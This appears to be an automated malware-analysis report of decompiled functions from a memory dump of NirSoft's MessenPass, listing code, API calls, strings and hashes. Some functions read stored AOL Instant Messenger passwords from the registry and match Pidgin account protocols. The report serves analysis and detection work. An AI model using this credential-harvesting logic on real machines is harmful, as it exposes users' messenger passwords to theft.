                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                          • memcpy.MSVCRT ref: 0041390A
                                          • memcpy.MSVCRT ref: 0041391C
                                          • _mbscpy.MSVCRT ref: 004139F3
                                          • memcpy.MSVCRT ref: 00413A24
                                          • memcpy.MSVCRT ref: 00413A36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$strlen$_mbscpy
                                          • String ID: salu
                                          • API String ID: 3691931180-4177317985
                                          • Opcode ID: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                          • Instruction ID: 50f97ef88cf8910c77a3c81ceda6bafe80676b1d4533e7ed44b9b26706654b38
                                          • Opcode Fuzzy Hash: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                          • Instruction Fuzzy Hash: 48712DB290011DAADF10EF95DC819DE77B8BF08348F1445BAF548E7141DB78AB888F95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403EDF, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 103COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E00403EDF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a117889) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t41;
				void* _t42;
				void* _t53;
				void* _t59;
				signed int _t63;
				intOrPtr* _t69;
				void* _t79;
				void* _t82;
				void* _t83;

				 *__eax =  *__eax + __eax;
				_a117889 = _a117889 + 0xc8;
				 *0x0008F951 =  *((intOrPtr*)(0x8f951)) + 0xc8;
				asm("adc [edx+0x55c30000], dh");
				0x414060(_t79);
				_t69 = 0xc8;
				_v8 = 0xc8;
				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t83 = _t82 + 0x2c;
				if( *0x41e350 != 0) {
					_push(0x41e350);
					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
					_t83 = _t83 + 0xc;
				}
				if( *0x41e34c != 0) {
					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
				}
				_t41 =  *((intOrPtr*)( *_t69 + 0x1c))();
				_t63 = 0x10;
				_push(_t41);
				_t42 = memcpy( &_v76, 0x419278, _t63 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t42,  &_v1100);
				E004067EC(_a4,  &_v4172);
				_push("MessenPass");
				_t59 = 6;
				_push(E0040876F(_t59));
				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
				_t53 = E004067EC(_a4,  &_v2124);
				_t90 = _a8 - 4;
				if(_a8 == 4) {
					_t53 = E0040A5A6(_v8, _t90, _a4);
				}
				return _t53;
			}























                                          0x00403ee1
                                          0x00403ee3
                                          0x00403ee9
                                          0x00403ef1
                                          0x00403efe
                                          0x00403f0e
                                          0x00403f10
                                          0x00403f13
                                          0x00403f28
                                          0x00403f2e
                                          0x00403f3c
                                          0x00403f42
                                          0x00403f50
                                          0x00403f56
                                          0x00403f5b
                                          0x00403f64
                                          0x00403f66
                                          0x00403f77
                                          0x00403f7c
                                          0x00403f7c
                                          0x00403f85
                                          0x00403f93
                                          0x00403f99
                                          0x00403f9e
                                          0x00403fa3
                                          0x00403fa4
                                          0x00403fad
                                          0x00403fc9
                                          0x00403fca
                                          0x00403fd9
                                          0x00403fe1
                                          0x00403fe8
                                          0x00403fee
                                          0x00403ffb
                                          0x0040400a
                                          0x00404012
                                          0x00404016
                                          0x0040401e
                                          0x0040401e
                                          0x00404027

                                          APIs
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          • memset.MSVCRT ref: 00403F2E
                                          • memset.MSVCRT ref: 00403F42
                                          • memset.MSVCRT ref: 00403F56
                                          • sprintf.MSVCRT ref: 00403F77
                                          • _mbscpy.MSVCRT ref: 00403F93
                                          • sprintf.MSVCRT ref: 00403FCA
                                          • sprintf.MSVCRT ref: 00403FFB
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                          • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                          • MessenPass, xrefs: 00403FE1
                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                          • API String ID: 113626815-2158351146
                                          • Opcode ID: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                          • Instruction ID: 7e850c38df9f1f0d15d36b6f1642bcd7d5b849b9a1e92852595dac58af72d1cd
                                          • Opcode Fuzzy Hash: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                          • Instruction Fuzzy Hash: 963195B2904258BFDB11DBA59C42EDE7BACAF14304F0440ABF508B7141DA799FC88B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403EF6, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 98COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E00403EF6(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t35;
				void* _t36;
				void* _t47;
				void* _t53;
				signed int _t57;
				intOrPtr* _t63;
				void* _t73;
				void* _t74;

				0x414060();
				_t63 = __ecx;
				_v8 = __ecx;
				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t74 = _t73 + 0x2c;
				if( *0x41e350 != 0) {
					_push(0x41e350);
					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
					_t74 = _t74 + 0xc;
				}
				if( *0x41e34c != 0) {
					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
				}
				_t35 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t57 = 0x10;
				_push(_t35);
				_t36 = memcpy( &_v76, 0x419278, _t57 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t36,  &_v1100);
				E004067EC(_a4,  &_v4172);
				_push("MessenPass");
				_t53 = 6;
				_push(E0040876F(_t53));
				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
				_t47 = E004067EC(_a4,  &_v2124);
				_t80 = _a8 - 4;
				if(_a8 == 4) {
					_t47 = E0040A5A6(_v8, _t80, _a4);
				}
				return _t47;
			}






















                                          0x00403efe
                                          0x00403f0e
                                          0x00403f10
                                          0x00403f13
                                          0x00403f28
                                          0x00403f2e
                                          0x00403f3c
                                          0x00403f42
                                          0x00403f50
                                          0x00403f56
                                          0x00403f5b
                                          0x00403f64
                                          0x00403f66
                                          0x00403f77
                                          0x00403f7c
                                          0x00403f7c
                                          0x00403f85
                                          0x00403f93
                                          0x00403f99
                                          0x00403f9e
                                          0x00403fa3
                                          0x00403fa4
                                          0x00403fad
                                          0x00403fc9
                                          0x00403fca
                                          0x00403fd9
                                          0x00403fe1
                                          0x00403fe8
                                          0x00403fee
                                          0x00403ffb
                                          0x0040400a
                                          0x00404012
                                          0x00404016
                                          0x0040401e
                                          0x0040401e
                                          0x00404027

                                          APIs
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          • memset.MSVCRT ref: 00403F2E
                                          • memset.MSVCRT ref: 00403F42
                                          • memset.MSVCRT ref: 00403F56
                                          • sprintf.MSVCRT ref: 00403F77
                                          • _mbscpy.MSVCRT ref: 00403F93
                                          • sprintf.MSVCRT ref: 00403FCA
                                          • sprintf.MSVCRT ref: 00403FFB
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                          • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                          • MessenPass, xrefs: 00403FE1
                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                          • API String ID: 113626815-2158351146
                                          • Opcode ID: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                          • Instruction ID: 526b9c6c735ab5766b9493b9c4eecad717bc7371a22eeca07e3dbb649928e63f
                                          • Opcode Fuzzy Hash: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                          • Instruction Fuzzy Hash: 6E3187B2900218BADB51DB95DC42EDE7BACAF54304F0440A7F50CB7141DA799FC88B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004062DB, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 168stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E004062DB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				int _v16;
				char _v20;
				char _v24;
				void* _v28;
				void _v1051;
				char _v1052;
				char _v2076;
				char _v3100;
				char _v4124;
				void _v5148;
				void _v6171;
				char _v6172;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t61;
				intOrPtr _t63;
				int _t79;
				int _t81;
				char* _t86;
				void* _t96;
				void* _t102;
				long _t104;
				char _t105;
				void* _t108;

				0x414060();
				_t61 = E004067BA(_a8);
				_t108 = _t61;
				_t96 = _t102;
				_v28 = _t108;
				if(_t108 != 0xffffffff) {
					_t104 = GetFileSize(_t108, 0);
					if(_t104 > 0) {
						_t3 = _t104 + 1; // 0x1
						_t63 = _t3;
						0x413d5c(_t63);
						_v12 = _t63;
						E00406ED6(_t96, 0, _t108, _t63, _t104);
						 *((char*)(_v12 + _t104)) = 0;
						_v24 = 0;
						_v1052 = 0;
						memset( &_v1051, 0, 0x3ff);
						_t105 = 0;
						_v16 = 0;
						_v20 = 0;
						_v8 = 0;
						_v6172 = 0;
						memset( &_v6171, 0, 0x3ff);
						memset( &_v5148, 0, 0x1000);
						if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
							L5:
							while(1) {
								if(_v16 > 0) {
									_t79 = strcmp( &_v1052, 0x4181f4);
									_pop(_t96);
									if(_t79 != 0) {
										__eflags = _v20;
										if(_v20 != 0) {
											__eflags = _t105;
											if(_t105 != 0) {
												__eflags = _t105 - 1;
												if(_t105 != 1) {
													__eflags = _t105 - 2;
													if(_t105 != 2) {
														__eflags = _t105 - 3;
														if(_t105 != 3) {
															__eflags = _t105 - 4;
															if(__eflags != 0) {
																if(__eflags > 0) {
																	__eflags = _v1052;
																	if(_v1052 == 0) {
																		L26:
																		_v8 = 0;
																	} else {
																		_t81 = strcmp( &_v1052, "---");
																		__eflags = _t81;
																		_pop(_t96);
																		if(_t81 == 0) {
																			goto L26;
																		}
																	}
																}
															} else {
																0x413d0c( &_v4124,  &_v1052);
																_pop(_t96);
																E0040623F(_a4,  &_v6172, _a8);
																_v5148 = 0;
																_v4124 = 0;
																_v3100 = 0;
																_v2076 = 0;
															}
														} else {
															_push( &_v1052);
															_t86 =  &_v2076;
															goto L20;
														}
													} else {
														_push( &_v1052);
														_t86 =  &_v5148;
														goto L20;
													}
												} else {
													_push( &_v1052);
													_t86 =  &_v3100;
													goto L20;
												}
											} else {
												_push( &_v1052);
												_t86 =  &_v6172;
												L20:
												0x413d0c();
												_t96 = _t86;
											}
											_t51 =  &_v8;
											 *_t51 = _v8 + 1;
											__eflags =  *_t51;
										}
									} else {
										if(_v20 == 0) {
											_v20 = 1;
										} else {
											_v5148 = 0;
											_v4124 = 0;
											_v3100 = 0;
											_v2076 = 0;
											_v6172 = 0;
										}
										_v8 = 0;
									}
								}
								_v16 = _v16 + 1;
								if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
									_t105 = _v8;
									continue;
								}
								goto L29;
							}
						}
						L29:
						0x413d56(_v12);
					}
					_t61 = CloseHandle(_v28);
				}
				return _t61;
			}






























                                          0x004062e3
                                          0x004062ee
                                          0x004062f3
                                          0x004062f8
                                          0x004062f9
                                          0x004062fc
                                          0x0040630c
                                          0x00406310
                                          0x00406316
                                          0x00406316
                                          0x0040631a
                                          0x00406324
                                          0x00406327
                                          0x00406334
                                          0x00406340
                                          0x00406343
                                          0x00406349
                                          0x00406356
                                          0x00406359
                                          0x0040635c
                                          0x0040635f
                                          0x00406362
                                          0x00406368
                                          0x0040637a
                                          0x00406397
                                          0x00000000
                                          0x004063a2
                                          0x004063a7
                                          0x004063b9
                                          0x004063c1
                                          0x004063c2
                                          0x004063f8
                                          0x004063fb
                                          0x00406401
                                          0x00406403
                                          0x00406414
                                          0x00406417
                                          0x00406428
                                          0x0040642b
                                          0x0040643c
                                          0x0040643f
                                          0x00406458
                                          0x0040645b
                                          0x0040649d
                                          0x0040649f
                                          0x004064a5
                                          0x004064be
                                          0x004064be
                                          0x004064a7
                                          0x004064b3
                                          0x004064b8
                                          0x004064bb
                                          0x004064bc
                                          0x00000000
                                          0x00000000
                                          0x004064bc
                                          0x004064a5
                                          0x0040645d
                                          0x0040646b
                                          0x00406474
                                          0x0040647e
                                          0x00406483
                                          0x00406489
                                          0x0040648f
                                          0x00406495
                                          0x00406495
                                          0x00406441
                                          0x00406447
                                          0x00406448
                                          0x00000000
                                          0x00406448
                                          0x0040642d
                                          0x00406433
                                          0x00406434
                                          0x00000000
                                          0x00406434
                                          0x00406419
                                          0x0040641f
                                          0x00406420
                                          0x00000000
                                          0x00406420
                                          0x00406405
                                          0x0040640b
                                          0x0040640c
                                          0x0040644e
                                          0x0040644f
                                          0x00406455
                                          0x00406455
                                          0x004064c1
                                          0x004064c1
                                          0x004064c1
                                          0x004064c1
                                          0x004063c4
                                          0x004063c7
                                          0x004063e9
                                          0x004063c9
                                          0x004063c9
                                          0x004063cf
                                          0x004063d5
                                          0x004063db
                                          0x004063e1
                                          0x004063e1
                                          0x004063f0
                                          0x004063f0
                                          0x004063c2
                                          0x004064c7
                                          0x004064dc
                                          0x0040639f
                                          0x00000000
                                          0x0040639f
                                          0x00000000
                                          0x004064dc
                                          0x004063a2
                                          0x004064e2
                                          0x004064e5
                                          0x004064ea
                                          0x004064ee
                                          0x004064ee
                                          0x004064f8

                                          APIs
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                            • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                          • memset.MSVCRT ref: 00406349
                                          • memset.MSVCRT ref: 00406368
                                          • memset.MSVCRT ref: 0040637A
                                          • strcmp.MSVCRT ref: 004063B9
                                          • _mbscpy.MSVCRT ref: 0040644F
                                          • _mbscpy.MSVCRT ref: 0040646B
                                          • strcmp.MSVCRT ref: 004064B3
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                          • CloseHandle.KERNEL32(?), ref: 004064EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Filememset$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                          • String ID: ---
                                          • API String ID: 3240106862-2854292027
                                          • Opcode ID: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
                                          • Instruction ID: 14ccde3f01574b0ce453d66bedc824b09869edf18580a01976bfbb4e6d9b59b2
                                          • Opcode Fuzzy Hash: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
                                          • Instruction Fuzzy Hash: A7517572C0415DAACF20DB949C819DEBBBCAF15314F1140FBE509B3181DA389BD98BAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E725, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 142registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 0040E768
                                          • memset.MSVCRT ref: 0040E77C
                                          • memset.MSVCRT ref: 0040E790
                                          • memset.MSVCRT ref: 0040E7A8
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • sprintf.MSVCRT ref: 0040E7D8
                                          • strlen.MSVCRT ref: 0040E806
                                          • _mbscpy.MSVCRT ref: 0040E888
                                          • _mbscpy.MSVCRT ref: 0040E89B
                                          • RegCloseKey.ADVAPI32(?), ref: 0040E8ED
                                          Strings
                                          • Password, xrefs: 0040E7DE
                                          • Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users, xrefs: 0040E735
                                          • %s\Login, xrefs: 0040E7D2
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$CloseEnumOpensprintfstrlen
                                          • String ID: %s\Login$Password$Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users
                                          • API String ID: 1782299107-1248239246
                                          • Opcode ID: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                          • Instruction ID: fd41fae155906cc5ed66380c8c1da9a21ab341a1702a4efca81b6986be60196d
                                          • Opcode Fuzzy Hash: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                          • Instruction Fuzzy Hash: 4B41C4B2C0011CAEDB21EBA59C41BDEBBBC9F59304F4040EAE549A3101D6399F99CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E8FD, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 100COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: prpl-gg$prpl-irc$prpl-jabber$prpl-msn$prpl-novell$prpl-oscar$prpl-yahoo
                                          • API String ID: 1439213657-1061492575
                                          • Opcode ID: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                          • Instruction ID: 427b895755571877c56e738dc42ee4b060dd70cd0f3c6fd0f8b1603a1220432f
                                          • Opcode Fuzzy Hash: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                          • Instruction Fuzzy Hash: 5031D6B124C3455ED730EE22954A7EB77D4AB90719F20082FF488A22C1EB7C59554B9F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408EAA, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E00408EAA(struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				intOrPtr _t29;
				struct HMENU__* _t31;
				intOrPtr* _t37;
				struct HWND__* _t41;
				struct HMENU__* _t46;

				0x414060();
				if(_a8 != 4) {
					if(_a8 == 5) {
						_t37 =  *0x41e390;
						if(_t37 == 0) {
							L8:
							_push(_a12);
							sprintf(0x41e308, "dialog_%d");
							_t41 = CreateDialogParamA(_a4, _a12, 0, E00408EA5, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t41,  &_v4104, 0x1000);
							if(_v4104 != 0) {
								E00408CA1("caption",  &_v4104);
							}
							EnumChildWindows(_t41, E00408E37, 0);
							DestroyWindow(_t41);
						} else {
							while(1) {
								_t29 =  *_t37;
								if(_t29 == 0) {
									goto L8;
								}
								if(_t29 != _a12) {
									_t37 = _t37 + 4;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					_push(_a12);
					sprintf(0x41e308, "menu_%d");
					_t31 = LoadMenuA(_a4, _a12);
					 *0x41e1fc =  *0x41e1fc & 0x00000000;
					_t46 = _t31;
					_push(1);
					_push(_t46);
					_push(_a12);
					E00408D47();
					DestroyMenu(_t46);
				}
				return 1;
			}










                                          0x00408eb2
                                          0x00408ebc
                                          0x00408f06
                                          0x00408f0c
                                          0x00408f17
                                          0x00408f2d
                                          0x00408f2e
                                          0x00408f3b
                                          0x00408f5c
                                          0x00408f66
                                          0x00408f6c
                                          0x00408f7d
                                          0x00408f89
                                          0x00408f97
                                          0x00408f9d
                                          0x00408fa5
                                          0x00408fac
                                          0x00408f19
                                          0x00408f27
                                          0x00408f27
                                          0x00408f2b
                                          0x00000000
                                          0x00000000
                                          0x00408f1e
                                          0x00408f24
                                          0x00000000
                                          0x00408f24
                                          0x00000000
                                          0x00408f1e
                                          0x00000000
                                          0x00408f27
                                          0x00408fb3
                                          0x00408fb3
                                          0x00408ebe
                                          0x00408ebe
                                          0x00408ecb
                                          0x00408ed9
                                          0x00408edf
                                          0x00408ee6
                                          0x00408ee8
                                          0x00408eea
                                          0x00408eeb
                                          0x00408eee
                                          0x00408ef7
                                          0x00408ef7
                                          0x00408fb9

                                          APIs
                                          • sprintf.MSVCRT ref: 00408ECB
                                          • LoadMenuA.USER32(?,?), ref: 00408ED9
                                            • Part of subcall function 00408D47: GetMenuItemCount.USER32(?), ref: 00408D5C
                                            • Part of subcall function 00408D47: memset.MSVCRT ref: 00408D7D
                                            • Part of subcall function 00408D47: GetMenuItemInfoA.USER32 ref: 00408DB8
                                            • Part of subcall function 00408D47: strchr.MSVCRT ref: 00408DCF
                                          • DestroyMenu.USER32(00000000), ref: 00408EF7
                                          • sprintf.MSVCRT ref: 00408F3B
                                          • CreateDialogParamA.USER32(?,00000000,00000000,00408EA5,00000000), ref: 00408F50
                                          • memset.MSVCRT ref: 00408F6C
                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 00408F7D
                                          • EnumChildWindows.USER32(00000000,Function_00008E37,00000000), ref: 00408FA5
                                          • DestroyWindow.USER32(00000000), ref: 00408FAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                          • String ID: caption$dialog_%d$menu_%d
                                          • API String ID: 3259144588-3822380221
                                          • Opcode ID: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                          • Instruction ID: 6ff3f41c44f65ef1366d905bf4693a1cca8442fec54ce1cacb3646534aec100a
                                          • Opcode Fuzzy Hash: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                          • Instruction Fuzzy Hash: 3B210F72500248FFDB12AF60DD45EEB3B69EB84709F14407EFA85A2190DA7949808B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409068, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 72COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00409068(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8) {
				void _v4103;
				char _v4104;
				int _t18;
				void* _t20;
				void* _t25;
				int _t27;
				void* _t29;

				0x414060();
				0x413d0c(0x41e200, _a8, _t25, _t29, _t20);
				0x413d0c(0x41e308, "general");
				E00408CA1("TranslatorName", 0x417c88);
				E00408CA1("TranslatorURL", 0x417c88);
				E00408CA1("Version", 0x417c88);
				EnumResourceNamesA(_a4, 4, E00408EAA, 0);
				EnumResourceNamesA(_a4, 5, E00408EAA, 0);
				0x413d0c(0x41e308, "strings");
				_t27 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t18 = LoadStringA(_a4, _t27,  &_v4104, 0x1000);
					if(_t18 > 0) {
						_t18 = E00408D0F(_t27,  &_v4104);
					}
					_t27 = _t27 + 1;
				} while (_t27 <= 0xffff);
				 *0x41e200 = 0;
				return _t18;
			}










                                          0x00409070
                                          0x00409080
                                          0x00409090
                                          0x004090a0
                                          0x004090ab
                                          0x004090b6
                                          0x004090d1
                                          0x004090db
                                          0x004090e3
                                          0x004090ee
                                          0x004090f8
                                          0x004090ff
                                          0x00409107
                                          0x00409113
                                          0x0040911b
                                          0x00409125
                                          0x0040912b
                                          0x0040912c
                                          0x0040912d
                                          0x00409137
                                          0x00409140

                                          APIs
                                          • _mbscpy.MSVCRT ref: 00409080
                                          • _mbscpy.MSVCRT ref: 00409090
                                            • Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
                                            • Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
                                            • Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01
                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
                                          • _mbscpy.MSVCRT ref: 004090E3
                                          • memset.MSVCRT ref: 004090FF
                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113
                                            • Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                          • String ID: TranslatorName$TranslatorURL$Version$general$strings
                                          • API String ID: 1035899707-2179912348
                                          • Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                          • Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
                                          • Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                          • Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041102B, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00411053
                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097
                                          Strings
                                          Memory Dump Source
